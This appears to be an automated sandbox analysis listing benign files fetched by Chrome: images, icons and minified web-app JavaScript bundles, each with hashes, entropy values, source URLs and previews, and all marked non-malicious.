                                                                                                                                                                                                        Size (bytes):31919
                                                                                                                                                                                                        Entropy (8bit):7.9788764423882395
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:4sfJBh2L/ydShxAOoeHBLuTCmM/TXgbBv5:bHh2L/vasBLuxugbBh
                                                                                                                                                                                                        MD5:3E112F922519BA097601A7C70AE81F23
                                                                                                                                                                                                        SHA1:BD530C8245F335CC0EFF3C70CA58F683B4B9A0D3
                                                                                                                                                                                                        SHA-256:C8BA665DF858EBBC888579FA8C396873F6BE37B3E3A9E09047B4B7026A0CA187
                                                                                                                                                                                                        SHA-512:D9D79F7635D60AD23DBD03CE612656E16780FD9603884E372B652EF03C011C5EE4DF24026E1A544A5B064EC9A351B7A54CC6DC4D74F249E2345A1BC67A7F99BA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR..............ZD.....PLTELiq.//...........................<>?.................................................................................x...........................................................o........z................p....4(.w...............aD8~......%.....D0....Q;0..........X..h...oP?:40...Y..............Q;....D.....d.pR..@2.............na......aG.~ZBU....._...p..p&uP)......l........y3.qB.f)waW...]*..o.jQ.......a..........'-.tZ......w.cF%......zp.|.e?.....I.......^UM.{...k...?..2.Q..ljkGFG...h...~VY]a.t..M.....{Gi.'.........}..|.....~...6'...-...}x{.............t..l.....P...ltLVr....P]/.....r......b..r.Z..t]y.i.}....g}..V.....5Tn..r..:....CR....6..ktt'..D..K....en..bo}.......bP...MBC..T.pY..q....EO`.F..3...p`...K...7.M.V1.....&tRNS...N......q..I).....1....c................pHYs............... .IDATx..y\.g...(..:]p..vz..b....A!...'p0..L.%.~@.B.VN.`.p.T........K.........GJ..`.X:r.s...9.~..u?O6..@...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1345
                                                                                                                                                                                                        Entropy (8bit):7.17588642126074
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:+zxYjUUyNzBvi43p4NEYzRhZP2IxTrjgstoIXxg9DU:+zxYjNyNQ+4NzzRh8gjg8oIhg9Y
                                                                                                                                                                                                        MD5:61A9BBED336266A0D54C75C37BECF78C
                                                                                                                                                                                                        SHA1:372F57CF23E68A55F6395777F103E051678A88BE
                                                                                                                                                                                                        SHA-256:97B2A5604AC236E3FBAC28CFA98A5D371F120C7F28760CB790736711936C501B
                                                                                                                                                                                                        SHA-512:2B97F8998CDE8A763C53B9BE53BBEA02A8293BF4EA9501A12AABECAEB6CC969D1A2DB8DC1197CED0D9B62673678B907AF28EC622BF1D2005B02F51F65B71ED4C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/91f64896-759a-41ae-8d14-d540f90c5870.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe....... ... ....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat......?..2.....1@.......]......p..+'*.....=..1{...S..$s...y.l........_..;.bO&kU.....E.$.-......X*Ut/..O......t.=jL..7.rL......B3:.Q...yp....p-.b..+4....^........C...]&8L..k....]...Q......&m.<]..r..R.v..+_13.V...",....Z....>f.F....8^..X%.gno.T.EP..V....e.{b...o..()..wU.Ns.....a.C$...s..\.0.w...h....jt...4..zQ..k^.9V .{..\4._.8k.a=4+...<Y..uL....v.TM.....!K@..@.....l1/...H.1d...F'...5.+!....B.6/#..zC.gM...y.._.A..~?..T........v(!.d.$......?...h4 2......0.....V.R..f..^...S.....m.2@.!.9...t......._..E..z....../.o!u.{..)...z....AC.D..6
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):172832
                                                                                                                                                                                                        Entropy (8bit):5.252399501785341
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:yVjExazug79h2U4kcNxakmBjt4oGZlibTR5ikxYhlUuRNka2wblHiN+wL8z9Gguk:Azug758kkEiXjOAprX2wd5WjguGOo
                                                                                                                                                                                                        MD5:9CBA688DE3179802DC353A91FA774AB9
                                                                                                                                                                                                        SHA1:2DEABD9F4967BF80DE121DF54E34E55B3CB89529
                                                                                                                                                                                                        SHA-256:928AD76603D098AA510D4F476704A3B9E16723E1C64F6B88E4B2295AC1C7FB72
                                                                                                                                                                                                        SHA-512:0077692BC75A9E706A9427C908EBDB6B48A05EFC9A4A7B65C898832142064563A40886B4790F8CBB6CB466031B26432E05DD3F8ABD8BB51EC76858D44AC9E2CC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1293],{510:function(e,t,n){var r,l=n(7653),a=n(40158),o={usingClientEntryPoint:!1,Events:null,Dispatcher:{current:null}};function i(e){var t="https://react.dev/errors/"+e;if(1<arguments.length){t+="?args[]="+encodeURIComponent(arguments[1]);for(var n=2;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n])}return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var u=Object.assign,s=l.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED,c=s.ReactCurrentDispatcher,f={pending:!1,data:null,method:null,action:null},d=[],p=-1;function m(e){return{current:e}}function h(e){0>p||(e.current=d[p],d[p]=null,p--)}function g(e,t){d[++p]=e.current,e.current=t}var y=Symbol.for("react.element"),v=Symbol.for("react.portal"),b=Symbol.for("react.fragment"),k=Symbol.for("react.strict_mode"),w=Symbol.for("react.profiler"),S
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3981), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3981
                                                                                                                                                                                                        Entropy (8bit):5.164514505172552
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:moFHFpRkbnwUw94IEvfxKje+LlhphlKYFG9gLNqIfqdQF6OD31U/VhXMklln:moNDHp/u06S6sk/hn
                                                                                                                                                                                                        MD5:03D3E13621569666362C73075E001CD9
                                                                                                                                                                                                        SHA1:75DAFDFC13E5457B011BADA4DD9A02A38815652E
                                                                                                                                                                                                        SHA-256:35A21F297F26AA71038E3236CCDD95EADC965042E916B8F789C548A8EE1D29E8
                                                                                                                                                                                                        SHA-512:AE9200D647DC2BC87C3B8789C3611E6D81F0EC800878B81F0E85D70AC510458F8A7668BD9F2E79821C6A68E436BBD0CDFC8AD8DB7A858937D999A0FCE8A947EE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:self.__BUILD_MANIFEST=function(s,e,a,c,t,i,r,d,o,n,u,h,f,p,k,v,b,l,w,j,y,m,g,_,I,T){return{__rewrites:{afterFiles:[{has:s,source:"/",destination:"/index"},{has:s,source:"/workspace/auth/callback",destination:k},{has:s,source:"/healthcheck",destination:"/api/healthcheck"},{has:s,source:"/search",destination:v},{has:s,source:"/search/:slugs*",destination:b},{has:s,source:"/products/new/:productId",destination:r},{has:s,source:"/products/new-dynamic/:productId",destination:l},{has:s,source:"/products/new/:productId/:campaignId",destination:r},{has:s,source:"/products/thank-you/:reviewId",destination:w},{has:s,source:"/providers/thank-you/:reviewId",destination:j},{has:s,source:"/providers/new/:providerId",destination:y},{has:s,source:"/providers/search",destination:m},{has:s,source:"/validate/:reviewType/thank-you",destination:g},{has:s,source:"/validate/:reviewType/:token",destination:_},{has:s,source:"/v/:linkType/:token",destination:I},{has:s,source:"/new/:localId",destination:d},{has:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6924
                                                                                                                                                                                                        Entropy (8bit):3.873351993615313
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:SkOOSeDAZ5vNdHfojVHvHAhIPspsNCttD2TSmBcp3QXol7Q8HRrpGC7k465uORpf:DDSeDAfVdHmHPsGlu5QATRrj6RwuVD
                                                                                                                                                                                                        MD5:359A1485C2C59C132514F9A460041A81
                                                                                                                                                                                                        SHA1:D85595590A33802D3F86A8F7CE7B006BB4DCF1CC
                                                                                                                                                                                                        SHA-256:FCCD35B61C6491305B208CB5C209D9D0E41E1A6B430A4C97E9E140F61060C544
                                                                                                                                                                                                        SHA-512:4C8C62A8845DB755954CCE9ECD8E8D30C172C7C9FE7EF6F01C1FBE07D65678D822EB6376F43639C69E7807046C18641DE21E6BADC681C0F81886681CB61E8419
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/download.svg
                                                                                                                                                                                                        Preview:<svg width="122" height="27" viewBox="0 0 122 27" xmlns="http://www.w3.org/2000/svg">. <g fill="#FFF" fill-rule="nonzero">. <path d="m0 9.913 11.181.002 6.8.001V3.181z"/>. <path d="M17.98 3.18v23.781L26.472 0z"/>. <path d="M17.98 9.916h-6.799l6.8 17.045z"/>. <path d="m0 9.913 12.925 4.376-1.744-4.374zM41.19 20.701a3.133 3.133 0 0 1-.493.37c-.23.147-.53.295-.899.443-.37.148-.82.275-1.354.382a9.444 9.444 0 0 1-1.835.16c-1.33 0-2.48-.214-3.448-.64-.969-.427-1.77-1.023-2.401-1.786-.632-.764-1.096-1.666-1.392-2.71-.295-1.042-.443-2.187-.443-3.435 0-1.247.16-2.401.48-3.46.32-1.06.8-1.974 1.44-2.746a6.621 6.621 0 0 1 2.402-1.81c.96-.435 2.09-.653 3.387-.653.64 0 1.219.058 1.736.172.517.115.968.251 1.355.407.385.156.705.32.96.492.254.173.447.317.579.431.148.132.275.288.382.468.106.181.16.378.16.591 0 .329-.124.657-.37.986a7.12 7.12 0 0 1-.813.91 10.009 10.009 0 0 0-.665-.603 4.499 4.499 0 0 0-.825-.541 5.47 5.47 0 0 0-1.034-.394 4.853 4.853 0 0 0-1.293-.16c-.837
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):24838
                                                                                                                                                                                                        Entropy (8bit):2.3123936816251356
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Fa0lD3+NH5Y6NPPz6goZXoSSMe2MZrkSylpN87wxov:RSUKEMlkNlpXCv
                                                                                                                                                                                                        MD5:9A7C6A64C52EAA1DC6FC290A935A2D01
                                                                                                                                                                                                        SHA1:BE06BE319FBC8876D68ED312BAE68907C897F546
                                                                                                                                                                                                        SHA-256:38CA62FCB1EFFC07AB4128F21883D112F2426B9EBC1B913A05FE759C3E0B6A9F
                                                                                                                                                                                                        SHA-512:73C929DE2CF7FBDB88F564F567D83688BBAA860B6A21D8E97201D609B0A0C1F21B30A966FD097C60C806350B91D1FF425E2091155FBD157AEF659D20CB257B7E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://indd.adobe.com/1_c19ab23/public/build/resources/favicon.ico
                                                                                                                                                                                                        Preview:......@@.... .(B..F... .... .....nB........ ......S........ .h....\..(...@......... ............................................................................................................................................................................. .................................... ......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>1..........................................................................................................MA............................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (5278), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5338
                                                                                                                                                                                                        Entropy (8bit):5.611456827465603
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:SfniKOPeF7YZZM7FBipwwzfjC8qU07qXxSIByojG8JiuK3UoFSYD+ne:jVPLZM7FspnzLpxSpojG8JimoFSYD+e
                                                                                                                                                                                                        MD5:E7CCF56CA886311E14101BA28E200BE5
                                                                                                                                                                                                        SHA1:A95C01B32A0DB56B6DF3DDBEF5A174B43AFC3A2C
                                                                                                                                                                                                        SHA-256:1598513E5AC713E5AD0C1F86F43B15767CCA1EEEF784322739899FFB7670ACA5
                                                                                                                                                                                                        SHA-512:013E8150767C029315F68BC3E4433F2E9AEBE67E7EFAA77A8112D487B6A7BAFC0C768CF7A0B5EE6B09E04BBD836772A21BA86BD5BA71B31EF9A6B29F8E5DAB59
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5810],{45810:function(n,t){t._getPrivFilters=function(){var n,t=/</g,u=/"/g,r=/'/g,e=/&/g,o=/\x00/g,i=/(?:^$|[\x00\x09-\x0D "'`=<>])/g,a=/[&<>"'`]/g,c=/(?:\x00|^-*!?>|--!?>|--?!?$|\]>|\]$)/g,l=/&(?:#([xX][0-9A-Fa-f]+|\d+);?|(Tab|NewLine|colon|semi|lpar|rpar|apos|sol|comma|excl|ast|midast|ensp|emsp|thinsp);|(nbsp|amp|AMP|lt|LT|gt|GT|quot|QUOT);?)/g,f={Tab:".",NewLine:"\n",colon:":",semi:";",lpar:"(",rpar:")",apos:"'",sol:"/",comma:",",excl:"!",ast:"*",midast:"*",ensp:".",emsp:".",thinsp:".",nbsp:"\xa0",amp:"&",lt:"<",gt:">",quot:'"',QUOT:'"'},y=/^(?:(?!-*expression)#?[-\w]+|[+-]?(?:\d+|\d*\.\d+)(?:r?em|ex|ch|cm|mm|in|px|pt|pc|%|vh|vw|vmin|vmax)?|!important|)$/i,m=/[\x00-\x1F\x7F\[\]{}\\"]/g,d=/[\x00-\x1F\x7F\[\]{}\\']/g,p=/url[\(\u207D\u208D]+/g,s=/['\(\)]/g,g=/\/\/%5[Bb]([A-Fa-f0-9:]+)%5[Dd]/,v={javascript:1,data:1,vbscript:1,mhtml:1,"x-schema":1},I=/(?::|&#[xX]0*3[aA];?|&#0*58;?|&colon;)/,C=/(?:^[\x00-\x20]+|[\t\n\r\x00]+)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (36995), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):36995
                                                                                                                                                                                                        Entropy (8bit):5.200154539819763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:h90Wjj74oB5Tf1JcNvDIweEzpg3pmAX7XODXWcWLfN5HS8IWpMvyfA+g/v:h90yj74A4pDNpM7XGWRfN51IOfA+2v
                                                                                                                                                                                                        MD5:7B7E39FCA61E2FC0B605DB6B496695F1
                                                                                                                                                                                                        SHA1:97C264DC630C80461F73675041D50ECD9760D0C5
                                                                                                                                                                                                        SHA-256:23AAEB229C57F3DA16FF1786D890F81DD548CCEC78081B918C3B7AAA70827BA2
                                                                                                                                                                                                        SHA-512:FD74C8B2A82CC3A9E76BB7279D3D639315EF4C638CCCE9C8D1EDFD674266D123D44037551630E498579BCA3A1F0848954146CA7D80B41DAFF6B1EDD26D17842B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/37.b6614199.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{"+nxv":function(e,t,n){"use strict";n.d(t,"a",function(){return initAndBind});var r=n("zgdO"),i=n("usiZ");function initAndBind(e,t){!0===t.debug&&("undefined"===typeof __SENTRY_DEBUG__||__SENTRY_DEBUG__?r.c.enable():console.warn("[Sentry] Cannot initialize SDK with `debug` option using a non-debug bundle."));var n=Object(i.a)(),s=n.getScope();s&&s.update(t.initialScope);var a=new e(t);n.bindClient(a)}},"5g57":function(e,t,n){"use strict";n.d(t,"a",function(){return v}),n.d(t,"b",function(){return addGlobalEventProcessor});var r=n("WwEg"),i=n("jm9a"),s=n("nfbA"),a=n("uIJS"),o=n("wQh9"),c=n("26VM"),u=n("xqFT"),_=n("bTzN"),d=n("zgdO"),l=n("Iwrg"),p=n("2nP+"),f=n("Te+l"),v=function(){function Scope(){Object(a.a)(this,Scope),this._notifyingListeners=!1,this._scopeListeners=[],this._eventProcessors=[],this._breadcrumbs=[],this._attachments=[],this._user={},this._tags={},this._extra={},this._contexts={},this._sdkProcessingMetadata={}}r
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (35552), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):35552
                                                                                                                                                                                                        Entropy (8bit):5.272922801597397
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:zeUUsSi7WTPK47rBtSTECq0XBkpurOMiQvNvvFJcXkryfGvWzo2t8YnO676kg5+n:pYichBgol0XadAvFgOvHzUW7S
                                                                                                                                                                                                        MD5:C6F58DD3D60F07462254B842DD4F9CA1
                                                                                                                                                                                                        SHA1:62C507FC6CC05F9732BCD5C593F3D8D0E0A3D7E2
                                                                                                                                                                                                        SHA-256:2A8A441D8086F20A64563EDC759ABA1DE84D932E34FF77B8BB0279A730CDB428
                                                                                                                                                                                                        SHA-512:21BF35D36D4859188BF32B21F84B71975B72503C72F5B64D7AB98CEFB58045F3F991960CAF9E8BCC95CDC284C6758DB639B4087750206450076263677CA4513B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/9.4a3e9801.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[9],{"+MLx":function(t,e,n){var r=n("HAuM");t.exports=function(t,e,n){if(r(t),void 0===e)return t;switch(n){case 0:return function(){return t.call(e)};case 1:return function(n){return t.call(e,n)};case 2:return function(n,r){return t.call(e,n,r)};case 3:return function(n,r,o){return t.call(e,n,r,o)}}return function(){return t.apply(e,arguments)}}},"/GqU":function(t,e,n){var r=n("RK3t"),o=n("HYAF");t.exports=function(t){return r(o(t))}},"07d7":function(t,e,n){var r=n("busE"),o=n("sEFX"),i=Object.prototype;o!==i.toString&&r(i,"toString",o,{unsafe:!0})},"0BK2":function(t,e){t.exports={}},"0Dky":function(t,e){t.exports=function(t){try{return!!t()}catch(e){return!0}}},"0GbY":function(t,e,n){var r=n("Qo9l"),o=n("2oRo"),i=function aFunction(t){return"function"==typeof t?t:void 0};t.exports=function(t,e){return arguments.length<2?i(r[t])||i(o[t]):r[t]&&r[t][e]||o[t]&&o[t][e]}},"0eef":function(t,e,n){"use strict";var r={}.propertyIsEnumerable,
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23897), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23897
                                                                                                                                                                                                        Entropy (8bit):5.309124558333512
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:qiH5aLGGy474znD9oSZXH79WfhaONcgnCXg9:XuGGhaXXY5TcgnCXg9
                                                                                                                                                                                                        MD5:CD29B9BC973E48A7FCD0EE7153BDF03B
                                                                                                                                                                                                        SHA1:AC3E5CF1C0D4183B2DF14C34BEBB84B3EE657799
                                                                                                                                                                                                        SHA-256:7CB58278C8F54A62C0AFA6DA0C67B3A45AAD637A0BF614E9C0DD42B73CEE266B
                                                                                                                                                                                                        SHA-512:253356199738322AE0D761A162136D91BA00018B180FF54C4D014C0B8AE4A93F5DD4D21664E8C582A4DB73F0F4265D34604D2B4C03CEF02A67882815ED328C2D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/52.b1edaf4a.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[52],{jrvE:function(e,t,n){"use strict";var r=n("nfbA"),a=n("cgfC"),i=n("a4gb"),o=n("+nxv"),c=n("usiZ"),s=n("nb4r"),u=n("2nP+"),l=n("AHQf"),d=n("jiYP"),p=n("zgdO"),f=n("bTzN"),v=n("jniC"),_=n("uIJS"),h=n("wQh9"),b=n("yvDu"),m=n("LvsC"),O=n("qytN"),g=n("7jL2"),y=n("LfGp"),j=n("uHEx"),E=n("Iwrg"),k=n("+OSO"),S=n("MiOA"),x=n("8dVd"),w=n("26VM"),T=n("mekd"),R=n("3QMb");function exceptionFromError(e,t){var n=parseStackFrames(e,t),r={type:t&&t.name,value:extractMessage(t)};return n.length&&(r.stacktrace={frames:n}),void 0===r.type&&""===r.value&&(r.value="Unrecoverable error caught"),r}function eventFromError(e,t){return{exception:{values:[exceptionFromError(e,t)]}}}function parseStackFrames(e,t){var n=t.stacktrace||t.stack||"",r=function getPopSize(e){if(e){if("number"===typeof e.framesToPop)return e.framesToPop;if(F.test(e.message))return 1}return 0}(t);try{return e(n,r)}catch(a){}return[]}var F=/Minified React error #\d+;/i;function extr
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (41615), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41615
                                                                                                                                                                                                        Entropy (8bit):5.444256318975822
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:LO0+9wEc/BCBfOn/3G8C+zNkikT8S06cdRIY1jQjzJufN+kDY9IlFCFStuhisWV9:K0xmBliel/w1DYqFCFSIisD5vHtQFEW
                                                                                                                                                                                                        MD5:CE626BD1589094FF48CDD39BE433A73B
                                                                                                                                                                                                        SHA1:1D43144A1AE47FB08E4371FFA10B7AE65FDB7712
                                                                                                                                                                                                        SHA-256:B5C53697456A79C40F0315E43F627C9D6E2AB4667C65048EA2B8B5A8A786C6AA
                                                                                                                                                                                                        SHA-512:1390FC67AD9B0D259C8399E4AACEF6C5B06296D9E67D8027ECA515280F4AF03E5324A8516253F04DD2DFEF1D722A24FCB0857C47AA447E3EECFBE7160176316F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[17],{"+D5C":function(e,t,n){"use strict";n.d(t,"c",function(){return r}),n.d(t,"b",function(){return o}),n.d(t,"a",function(){return a});var r=Object.freeze({CHAT:"chat",USER:"user",PRESENCE:"presence",VISITOR_PRESENCE:"visitor_presence"}),o=Object.freeze({CHAT:"chat",USER:"user",ORG_PUBLIC:"live",LIVE:"live"}),a=Object.freeze({CHAT:"chat",USER:"user",PRESENCE:"presence"})},"+Zvl":function(e,t,n){"use strict";var r=n("QtlZ"),o=n("ILQF"),a=n("H/qh"),c=["__DRIFT_WIDGET_RECEIVE_CHANNEL","REPLACE_STATE"];t.a=function actionSyncMiddleware(){return function(e){return function(t){return t._foreignDispatch||Object(a.a)(t.type,c)||r.a&&r.a.name&&Object(o.a)({topic:"".concat(r.a.name,":action-dispatch"),message:{action:t}}),e(t)}}}},"0lfv":function(e,t,n){"use strict";n.d(t,"j",function(){return _}),n.d(t,"q",function(){return A}),n.d(t,"g",function(){return forceFocus}),n.d(t,"r",function(){return I}),n.d(t,"s",function(){return j}),n.d(t,"e"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5063
                                                                                                                                                                                                        Entropy (8bit):7.344077838430976
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jKc5N26MT0D5MdtbZPAVwzVHlIerm8zOD1ly7Ckm3:+0GcoYNMtKw/8+qnJ
                                                                                                                                                                                                        MD5:D47CA34A5139C44841BAC86077DCE50A
                                                                                                                                                                                                        SHA1:7B187B45D72D1432116B23D739483FDAD4530BF0
                                                                                                                                                                                                        SHA-256:08ED4B93CD472F155AD963DF49BB6B0E6120DAB245361D870710364841FCC365
                                                                                                                                                                                                        SHA-512:A3DC1F7B63BDA7158E2F2C5292D9FBE9FF0E098A3F1F3E0BFEA859C50B3FECA07DD9181C1DC5FFE74223FC9143CE88098BC2B15BEAB9F49601B9E052D7D9D77F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/35e9db05-94a1-4859-b307-858b9d3946cb.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o...X...(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/ga/rul?tid=G-M5DGBDHG2R&gacid=1968510630.1725034605&gtm=45je48s0v879522845z876106154za200zb76106154&dma=0&gcs=G111&gcd=13t3t3t3t5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=1849167802
                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3875
                                                                                                                                                                                                        Entropy (8bit):7.043440121496707
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:+zYjwQcjFflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJg5:+0jTc5N26MT0D5MdtbZPAVwzVHliyKr
                                                                                                                                                                                                        MD5:B21C5ABEDDA10C1B0787D7DB2537CBF2
                                                                                                                                                                                                        SHA1:8E2E997CF28BBF5EDF635C5BF330180192963BA9
                                                                                                                                                                                                        SHA-256:D5F7E1774FFF0DE54100446B9C675810EC41F59A8EA548D08B8D9B75E9D96097
                                                                                                                                                                                                        SHA-512:CB8D646B0213BD7892A10B4D1A56622D2DBEE7357A08E1C0DBFBCFDFD23FB8FECA6AE78B55408E1C45A7DE09025F1993593A1D245C064313DFD057FBDC370830
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/a5d35bcd-e674-49ae-b851-7c2579a7969f.jpeg?w=60&h=60&dpr=2&auto=format
